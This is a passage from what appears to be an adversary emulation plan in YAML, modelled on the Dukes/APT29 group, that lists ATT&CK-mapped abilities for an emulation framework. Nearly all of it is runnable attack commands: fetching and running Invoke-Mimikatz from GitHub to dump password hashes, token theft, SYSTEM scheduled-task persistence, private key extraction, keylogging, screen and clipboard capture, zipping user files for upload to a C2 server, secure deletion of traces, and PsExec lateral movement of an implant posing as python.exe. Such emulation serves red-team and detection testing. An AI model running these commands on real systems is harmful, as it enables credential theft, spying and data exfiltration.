"C:\Users\#{profile_user}\Downloads\SysInternalsSuite") { - Remove-Item -path "C:\Users\#{profile_user}\Downloads\SysInternalsSuite" -recurse -force; - } - - Set-Location -path "C:\Program Files\SysInternalsSuite"; - if ($?) { - gci; - write-host "[*] Successfully planted files" - } else { - write-host "[!] Error downloading and planting modified system tools." - } - -- id: 59592c35-8207-4896-8d8b-36ad4600245d - name: Remote System Discovery - description: The net utility is executed via cmd to enumerate DCs within the domain - tactic: discovery - technique: - attack_id: T1018 - name: "Remote System Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "4.A.2" - platforms: - windows: - psh,pwsh: - command: | - cmd.exe /c net group "Domain Controllers" /domain - - executors: - - name: powershell - command: | - cmd.exe /c net group "Domain Controllers" /domain - -- id: 24ed020e-4730-4000-b6b4-6b5d3e95314f - name: Remote System Discovery - description: The net utility is executed via cmd to enumerate hosts within the domain. - tactic: discovery - technique: - attack_id: T1018 - name: "Remote System Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "4.A.3" - platforms: - windows: - psh,pwsh: - command: | - cmd.exe /c net group "Domain Computers" /domain - - executors: - - name: powershell - command: | - cmd.exe /c net group "Domain Computers" /domain - -- id: 5f4263c4-7ff1-4098-b5f5-f41faa31cf5b - name: System Network Configuration Discovery - description: The netsh utility is executed via cmd to enumerate local firewall configuration information. - tactic: discovery - technique: - attack_id: T1016 - name: "System Network Configuration Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "4.B.1" - platforms: - windows: - cmd: - command: | - netsh advfirewall show allprofiles - - executors: - - name: command_prompt - command: | - netsh advfirewall show allprofiles - -- id: 646be6c9-f27a-4f5f-be5d-b8a0317e215f - name: Process Discovery - description: List running process on the machine via PowerShell. - tactic: discovery - technique: - attack_id: T1057 - name: "Process Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "4.B.2" - platforms: - windows: - psh,pwsh: - command: | - $ps = get-process; - write-output $ps; - - executors: - - name: powershell - command: | - $ps = get-process; - write-output $ps; - -- id: 9b5b5aec-32ff-4d74-8555-727b50ab15f6 - name: Artifact Cleanup - Delete Files - description: Cleanup files related to Operation - tactic: defensive-evasion - technique: - attack_id: T1070.004 - name: "Indicator Removal on Host: File Deletion" - cti_source: "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=6ab66701-25d7-4685-ae9d-93d63708a11c&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" - procedure_group: procedure_def_evasion - procedure_step: "4.B.3" - platforms: - windows: - psh,pwsh: - command: | - if (! $(test-path -path "C:\Program Files\SysInternalsSuite";)) { - write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; - exit 1; - } - Set-Location -path "C:\Program Files\SysInternalsSuite"; - gci $env:userprofile\Desktop; - .\sdelete64.exe /accepteula "$env:USERPROFILE\Desktop\‮cod.3aka3.scr"; - .\sdelete64.exe /accepteula "$env:APPDATA\Draft.Zip"; - .\sdelete64.exe /accepteula "$env:USERPROFILE\Downloads\SysInternalsSuite.zip"; - - executors: - - name: powershell - command: | - if (! $(test-path -path "C:\Program Files\SysInternalsSuite";)) { - write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; - exit 1; - } - Set-Location -path "C:\Program Files\SysInternalsSuite"; - gci $env:userprofile\Desktop; - .\sdelete64.exe /accepteula "$env:USERPROFILE\Desktop\‮cod.3aka3.scr"; - .\sdelete64.exe /accepteula "$env:APPDATA\Draft.Zip"; - .\sdelete64.exe /accepteula "$env:USERPROFILE\Downloads\SysInternalsSuite.zip"; - -- id: 6f1f4768-7099-45d2-a858-b49dc792234e - name: Loading Stage-2 & Performing Discovery - description: Load Stage-2 from Modified Sysinternals Toolset - tactic: discovery - technique: - attack_id: T1082 - name: "System Information Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "4.C.1" - platforms: - windows: - psh,pwsh: - command: | - if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { - write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysInternalsSuite"; - if (!(test-path ".\readme.ps1")) { - Move-Item .\readme.txt readme.ps1 -Force; - } - . .\readme.ps1; - Invoke-Discovery; - - executors: - - name: powershell - command: | - if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { - write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysInternalsSuite"; - if (!(test-path ".\readme.ps1")) { - Move-Item .\readme.txt readme.ps1 -Force; - } - . .\readme.ps1; - Invoke-Discovery; - -- id: ba0b398d-91b8-490a-bed2-f959afa8e1aa - name: 4.C.2 - System Network Connections Discovery (T1049) - description: The netstat utility is executed via cmd to enumerate local active network connections. - tactic: discovery - technique: - attack_id: T1049 - name: "System Network Connections Discovery" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_discovery - procedure_step: "4.C.2" - platforms: - windows: - cmd: - command: | - netstat -ano - - executors: - - name: command_prompt - command: | - netstat -ano - -# Step 5 - Persistence - -- id: effbedc1-1bc8-4a75-9395-980559700008 - name: Credential Dumping using Process Injection - description: Mimikatz lsadump::sam is executed via Invoke-Mimikatz to dump hashes via process injection into LSASS. - tactic: credential-access - technique: - attack_id: T1003 - name: "Credential Dumping" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_cred_access - procedure_step: "5.A.1" - platforms: - windows: - psh,pwsh: - command: | - [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }; - $web = (New-Object System.Net.WebClient); - $result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); - iex $result; - function hashdump - { - Invoke-Mimikatz -Command "privilege::debug token::elevate lsadump::sam exit" - }; - hashdump; - - executors: - - name: powershell - command: | - [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True }; - $web = (New-Object System.Net.WebClient); - $result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1"); - iex $result; - function hashdump - { - Invoke-Mimikatz -Command "privilege::debug token::elevate lsadump::sam exit" - }; - hashdump; - -- id: 9c75155e-21ab-4471-af16-45f3795a313c - name: Persistent Service 1 - description: Leverage modified Sysinternals - tactic: persistence - technique: - attack_id: T1547.009 - name: "Boot or Logon Autostart Execution: Shortcut Modification" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_persistence - procedure_step: "5.A.2" - platforms: - windows: - psh,pwsh: - command: | - Set-Location -path "C:\Program Files\SysinternalsSuite"; - if (get-service -name "javamtsup" -ErrorAction SilentlyContinue) { - write-host "[*] Service already exists...Not running persistence step-1"; - exit 1; - } - - if (Test-Path -path "readme.ps1") { - . .\readme.ps1; - Invoke-Persistence -PersistStep 1; - write-host "[+] Persistence 1 invoked."; - exit 0; - - } else { - write-host "[!] readme.ps1 not found."; - exit 1; - } - - executors: - - name: powershell - command: | - Set-Location -path "C:\Program Files\SysinternalsSuite"; - if (get-service -name "javamtsup" -ErrorAction SilentlyContinue) { - write-host "[*] Service already exists...Not running persistence step-1"; - exit 1; - } - - if (Test-Path -path "readme.ps1") { - . .\readme.ps1; - Invoke-Persistence -PersistStep 1; - write-host "[+] Persistence 1 invoked."; - exit 0; - - } else { - write-host "[!] readme.ps1 not found."; - exit 1; - } - -- id: 45f18b58-c14f-4b61-a3da-41b67af21429 - name: Persistent Service 2 - description: Leverage modified Sysinternals - tactic: persistence - technique: - attack_id: T1547.009 - name: "Boot or Logon Autostart Execution: Shortcut Modification" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_persistence - procedure_step: "5.B.1" - platforms: - windows: - psh,pwsh: - command: | - Set-Location -path "C:\Program Files\SysinternalsSuite"; - if (Test-Path -path "readme.ps1") { - . .\readme.ps1; - Invoke-Persistence -PersistStep 2; - write-host "[+] Persistence 2 invoked."; - - } else { - write-host "[!] readme.ps1 not found."; - return 1; - } - - executors: - - name: powershell - command: | - Set-Location -path "C:\Program Files\SysinternalsSuite"; - if (Test-Path -path "readme.ps1") { - . .\readme.ps1; - Invoke-Persistence -PersistStep 2; - write-host "[+] Persistence 2 invoked."; - - } else { - write-host "[!] readme.ps1 not found."; - return 1; - } - -- id: 03afada1-1714-408f-bde5-f528b91dc89d - name: Access Token Manipulation - description: A token theft script was executed to steal and assume the token of another user’s existing process, changing the user context of the process. - tactic: defensive-evasion - technique: - attack_id: T1134 - name: "Access Token Manipulation" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_def_evasion - procedure_step: "5.B.2" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - payloads: - - StealToken.ps1 - - sandcat.go-windows - - input_arguments: - remote.file.share: - description: IP or Hostname of remote file share - type: string - default: 192.0.2.10 - - server: - description: IP or Hostname of server - type: string - default: 127.0.0.1 - - executors: - - name: powershell - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - -# Step 6 - Credential Access - -- id: e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d - name: Credentials In Files- Chrome - description: Obtain credentials from Chrome Dumper - tactic: credential-access - technique: - attack_id: T1003 - name: "Credential Dumping" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_cred_access - procedure_step: "6.A.1" - platforms: - windows: - psh,pwsh: - command: | - if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { - write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysinternalsSuite"; - ./accesschk.exe -accepteula .; - - executors: - - name: powershell - command: | - if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { - write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysinternalsSuite"; - ./accesschk.exe -accepteula .; - -- id: 1b9e018d-986d-42d9-bb8b-0e104e98ce9c - name: Query Registry - description: A token theft script was executed to steal and assume the token of another user’s existing process, changing the user context of the process. - tactic: defensive-evasion - technique: - attack_id: T1134 - name: "Access Token Manipulation" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_def_evasion - procedure_step: "6.A.2" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - payloads: - - StealToken.ps1 - - sandcat.go-windows - - input_arguments: - remote.file.share: - description: IP or Hostname of remote file share - type: string - default: 192.0.2.20 - - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - -- id: c4f4b13c-87b6-498c-b814-93570173068c - name: Credentials In Files (T1081) - Private Keys Extraction - description: Obtain credentials via Custom PowerShell - tactic: credential-access - technique: - attack_id: T1552.004 - name: "Unsecured Credentials: Private Keys" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_cred_access - procedure_step: "6.B" - platforms: - windows: - psh,pwsh: - command: | - Import-PfxCertificate -Exportable -FilePath ".\dmevals.local.pfx" -CertStoreLocation Cert:\LocalMachine\My; - - if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { - write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; - exit 1; - } - Set-Location -path "C:\Program Files\SysinternalsSuite"; - . .\readme.ps1; - Get-PrivateKeys; - if ($? -eq $True) { - write-host "[+] Successfully executed private key collection script."; - exit 0; - } else { - write-host "[!] Error, could not execution Get-PrivateKeys."; - exit 1; - } - payloads: - - dmevals.local.pfx - - executors: - - name: powershell - command: | - Import-PfxCertificate -Exportable -FilePath ".\dmevals.local.pfx" -CertStoreLocation Cert:\LocalMachine\My; - - if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { - write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; - exit 1; - } - Set-Location -path "C:\Program Files\SysinternalsSuite"; - . .\readme.ps1; - Get-PrivateKeys; - if ($? -eq $True) { - write-host "[+] Successfully executed private key collection script."; - exit 0; - } else { - write-host "[!] Error, could not execution Get-PrivateKeys."; - exit 1; - } - -# Step 7 - Collection and Exfiltration -- id: a4b14c10-49aa-4ae4-b165-d5a37364fe62 - name: Staging files for PowerShell module imports - description: Renaming psversion.txt to psversion.txt to be imported - tactic: defensive-evasion - technique: - attack_id: T1036.005 - name: "Masquerading: Match Legitimate Name or Location" - cti_source: "https://securelist.com/the-cozyduke-apt/69731/" - procedure_group: procedure_def_evasion - procedure_step: "7.A.1" - platforms: - windows: - psh,pwsh: - command: | - if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { - write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysInternalsSuite"; - if (test-path -path ".\psversion.txt" ) { - move-item .\psversion.txt psversion.ps1 -Force; - } - write-host "[+] File psversion.ps1 staged to be imported." - - executors: - - name: powershell - command: | - if (! $(test-path -path "C:\Program Files\SysInternalsSuite")) { - write-host "[!] The path C:\Program Files\SysInternalsSuite does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysInternalsSuite"; - if (test-path -path ".\psversion.txt" ) { - move-item .\psversion.txt psversion.ps1 -Force; - } - write-host "[+] File psversion.ps1 staged to be imported." - -- id: a81ea4ad-bc9f-49a7-82d4-4466df641487 - name: Screen Capturing - description: Load custom PowerShell module and take screenshots. - tactic: collection - technique: - attack_id: T1113 - name: "Screen Capture" - cti_source: "https://securelist.com/the-cozyduke-apt/69731/" - procedure_group: procedure_collection - procedure_step: "7.A.2" - platforms: - windows: - psh,pwsh: - command: | - if (! $(test-path -path "C:\Program Files\SysinternalsSuite\psversion.ps1";)) { - write-host "[!] The path C:\Program Files\SysinternalsSuite\psversion.ps1 does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysinternalsSuite"; - . .\psversion.ps1; - Invoke-ScreenCapture; Start-Sleep -Seconds 3; View-Job -JobName "Screenshot"; - - executors: - - name: powershell - command: | - if (! $(test-path -path "C:\Program Files\SysinternalsSuite\psversion.ps1";)) { - write-host "[!] The path C:\Program Files\SysinternalsSuite\psversion.ps1 does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysinternalsSuite"; - . .\psversion.ps1; - Invoke-ScreenCapture; Start-Sleep -Seconds 3; View-Job -JobName "Screenshot"; - -- id: ee4c2eab-be57-434c-a32c-14b77360301a - name: Automated Collection (T1119) - Clipboard (T1115) - description: Get contents of clipboard - tactic: collection - technique: - attack_id: T1115 - name: "Clipboard Data" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_collection - procedure_step: "7.A.3" - platforms: - windows: - psh,pwsh: - command: | - $clip_data=get-clipboard; - if ($clip_data.Length -gt 0) { - write-host "[+] Clipboard data obtained!\n"; - write-host $clip_data; - } else { - write-host "[!] No clipboard data available!\n"; - } - - executors: - - name: powershell - command: | - $clip_data=get-clipboard; - if ($clip_data.Length -gt 0) { - write-host "[+] Clipboard data obtained!\n"; - write-host $clip_data; - } else { - write-host "[!] No clipboard data available!\n"; - } - -- id: db28f68d-e8b8-46e6-b680-642570d4b257 - name: Automated Collection (T1119) - Input Capture (T1417) - description: Load custom PowerShell module, and grab keystrokes for 15 seconds. - tactic: collection - technique: - attack_id: T1056.001 - name: "Input Capture: Keylogging" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_collection - procedure_step: "7.A.4" - platforms: - windows: - psh,pwsh: - command: | - if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { - write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; - exit 1; - } - Set-Location -path "C:\Program Files\SysinternalsSuite"; - . .\psversion.ps1; - Get-Keystrokes; - Start-Sleep -Seconds 15; - View-Job -JobName "Keystrokes"; - - executors: - - name: powershell - command: | - if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { - write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; - exit 1; - } - Set-Location -path "C:\Program Files\SysinternalsSuite"; - . .\psversion.ps1; - Get-Keystrokes; - Start-Sleep -Seconds 15; - View-Job -JobName "Keystrokes"; - -- id: a612311d-a802-48da-bb7f-88a4b9dd7a24 - name: Data from staged file (T1074) and Exfiltration over C2 Channel (T1041) - description: Compress all data within Download directory and exfiltrate the results. - tactic: exfiltration - technique: - attack_id: T1041 - name: "Exfiltration Over C2 Channel" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_exfiltration - procedure_step: "7.B.1" - platforms: - windows: - psh,pwsh: - command: | - Write-Host "[*] Compressing all the things in download dir"; - Compress-Archive -Path "C:\Users\#{profile_user}\Downloads\*.*" -DestinationPath "$env:APPDATA\OfficeSupplies.zip"; - - Import-Module .\upload.ps1 -Verbose -Force; - Invoke-MultipartFormDataUpload -InFile "$env:APPDATA\OfficeSupplies.zip" -Uri "#{server}/file/upload"; - if ($?) { - write-host "[+] Data exfil of download directory completed!"; - } else { - write-host "[!] Data exfil failed!"; - } - - payloads: - - upload.ps1 - - input_arguments: - profile_user: - description: Name of profile user - type: string - default: Administrator - - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Write-Host "[*] Compressing all the things in download dir"; - Compress-Archive -Path "C:\Users\#{profile_user}\Downloads\*.*" -DestinationPath "$env:APPDATA\OfficeSupplies.zip"; - - Import-Module .\upload.ps1 -Verbose -Force; - Invoke-MultipartFormDataUpload -InFile "$env:APPDATA\OfficeSupplies.zip" -Uri "#{server}/file/upload"; - if ($?) { - write-host "[+] Data exfil of download directory completed!"; - } else { - write-host "[!] Data exfil failed!"; - } - -- id: 9b518cfb-125f-466e-872b-4f8171773ce5 - name: Remote File Copy (T1105) - description: A token theft script was executed to steal and assume the token of another user’s existing process, changing the user context of the process. - tactic: defensive-evasion - technique: - attack_id: T1134.001 - name: "Access Token Manipulation: Token Impersonation/Theft" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_def_evasion - procedure_step: "7.B.2" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - payloads: - - StealToken.ps1 - - sandcat.go-windows - - input_arguments: - remote.file.share: - description: IP or Hostname of remote file share - type: string - default: 192.0.2.20 - - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - -- id: 6b90da47-13d0-48fc-8f07-0a1e6d5d876e - name: Scheduled Tasks (T1053) - description: A token theft script was executed to steal and assume the token of another user’s existing process, changing the user context of the process. - tactic: defensive-evasion - technique: - attack_id: T1134.001 - name: "Access Token Manipulation: Token Impersonation/Theft" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_def_evasion - procedure_step: "7.C.1" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - payloads: - - StealToken.ps1 - - sandcat.go-windows - - input_arguments: - remote.file.share: - description: IP or Hostname of remote file share - type: string - default: 192.0.2.20 - - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - -# Step 8 - Lateral Movement - -- id: 95564347-e77a-4a89-b08f-dcafa5468f2c - name: Remote System Discovery (T1018) - description: Custom PowerShell script to perform AD triage for domain bound computers. - tactic: execution - technique: - attack_id: T1059.001 - name: "Command and Scripting Interpreter: PowerShell" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_execution - procedure_step: "8.A.1" - platforms: - windows: - psh,pwsh: - command: | - if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { - write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysinternalsSuite"; - . .\psversion.ps1; - Ad-Search Computer Name *; - - executors: - - name: powershell - command: | - if (! $(test-path -path "C:\Program Files\SysinternalsSuite")) { - write-host "[!] The path C:\Program Files\SysinternalsSuite does not exist. Execution has stopped."; - exit 1; - } - - Set-Location -path "C:\Program Files\SysinternalsSuite"; - . .\psversion.ps1; - Ad-Search Computer Name *; - -- id: c4a59e39-53b0-4ace-9528-8ff052752ece - name: Identifying current user on other machines - description: Custom PowerShell script to perform AD triage for domain bound computers. - tactic: execution - technique: - attack_id: T1059.001 - name: "Command and Scripting Interpreter: PowerShell" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_execution - procedure_step: "8.A.2" - platforms: - windows: - psh: - command: | - Invoke-Command -ComputerName "$(hostname)" -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId -Last 1; - - executors: - - name: powershell - command: | - Invoke-Command -ComputerName "$(hostname)" -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId -Last 1; - -- id: 9fefcde6-083a-4440-8eca-dc03d30c0bcb - name: File and Directory Discovery (T1083) - description: A token theft script was executed to steal and assume the token of another user’s existing process, changing the user context of the process. - tactic: defensive-evasion - technique: - attack_id: T1134.001 - name: "Access Token Manipulation: Token Impersonation/Theft" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_def_evasion - procedure_step: "8.A.3" - platforms: - windows: - psh,pwsh: - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - payloads: - - StealToken.ps1 - - sandcat.go-windows - - input_arguments: - remote.file.share: - description: IP or Hostname of remote file share - type: string - default: 192.0.2.20 - - server: - description: IP or Hostname of server - type: string - default: 192.0.2.10 - - executors: - - name: powershell - command: | - Import-Module .\StealToken.ps1 -Verbose -Force; - StealToken; - CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\#{remote.file.share}\hklm\system\currentcontrolset\control\terminal server"'; - CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe #{server} evals" /sc ONLOGON /RU SYSTEM'; - CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b #{remote.file.share}'; - CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%'; - RevertToSelf; - -- id: bddc0abc-07a0-41b7-813f-e0c64d9226b3 - name: Copy Sandcat File - description: Copy Sandcat file using PsExec - tactic: lateral-movement - technique: - attack_id: T1105 - name: "Ingress Tool Transfer" - cti_source: "https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf" - procedure_group: procedure_lat_movement - procedure_step: "8.B" - platforms: - windows: - psh,pwsh: - command: | - move-item sandcat.go-windows-upx C:\Windows\temp\python.exe -force; - set-location "C:\Program Files\SysinternalsSuite\"; - .\PsExec64.exe -accepteula \\#{pivot_machine_hostname} -i #{user.session.id} -d -f -c "C:\Windows\Temp\python.exe" -group "day-1-lateral-movement" -server "#{server}"; - tasklist /S #{pivot_machine_hostname} /FI "IMAGENAME eq python.exe"; - payloads: - - 